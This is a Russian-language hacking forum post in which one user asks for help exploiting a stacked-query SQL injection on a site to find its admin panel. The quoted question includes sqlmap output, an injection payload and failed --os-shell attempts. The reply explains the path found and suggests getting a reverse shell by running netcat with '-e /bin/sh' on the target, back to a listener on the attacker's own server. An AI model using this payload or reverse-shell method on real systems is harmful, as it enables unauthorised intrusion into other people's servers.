Показать сообщение отдельно

  #4  
Старый 18.05.2017, 14:52
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от spize0r  

Подскажите по такому вопросу. Нужно раскрыть названия директорий в списке, в частности найти админку.
Все способы перпробовал, вроде все закрыто. Но. При использовании SQLMAP можно получить путь к базе.
Код:
[13:12:11] [INFO] retrieving MySQL plugin directory absolute path
[13:12:11] [INFO] resumed: /us\x81/lib64/mysql/plugin
Сама уязвимость.
Код:
Parameter: id (GET)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: id=103;SELECT SLEEP(5)#&id=103
Если отрывается путь к базе, значит можно и просканировать все папки подумал я.
Начал использовать --os-shell.
UDF вроде как создается
Код:
creating UDF 'sys_eval'
creating UDF 'sys_exec'
И, также при завершении os-shell, программа спрашивает:
Код:
[13:40:08] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n]
НО
команды в строке ничего не выводят, как только не делал
Код:
os-shell> namehost
do you want to retrieve the command standard output? [Y/n/a] y
[13:26:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
No output
Сообственно вопрос: если нашло путь к базе, хоть и долго мучало сервер, но нашло. Значит можно получить любые директории? Есть ли какие то мысли на этот счет?
Это пути директории где по умолчанию находятся плагины. В ТОМ числе плагин, или как она ещё верно называется библиотека для мускул сервера что бы выполнить UDF. А значит , я смею предположить что ничего вы не нашли. Ну предположим, у вас слепое

выполнение команд. На целевом сервере делаем запрос nc ((195,1,1,1)ip вашего сервера) 4444 -e /bin/sh . У себя на выделенным сервере nc -lvp 4444. В случаи успеха будет шелл. Но, я очень сомневаюсь что у вас что-то получиться. Удачи.
 
Ответить с цитированием